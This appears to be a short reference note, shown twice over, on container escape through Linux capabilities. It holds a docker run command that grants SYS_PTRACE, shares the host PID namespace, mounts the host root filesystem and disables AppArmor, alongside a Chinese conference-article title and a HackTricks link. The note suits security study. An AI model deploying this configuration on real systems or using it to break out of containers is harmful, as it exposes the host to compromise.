docker run -it --rm --pid=host --cap-add=SYS_PTRACE -v /:/tmp/host --security-opt apparmor=unconfined ubuntu bash
洞见RSA 2023|容器逃逸之Capabilities利用 - 脉脉
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities
docker run -it --rm --pid=host --cap-add=SYS_PTRACE -v /:/tmp/host --security-opt apparmor=unconfined ubuntu bash
洞见RSA 2023|容器逃逸之Capabilities利用 - 脉脉
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/linux-capabilities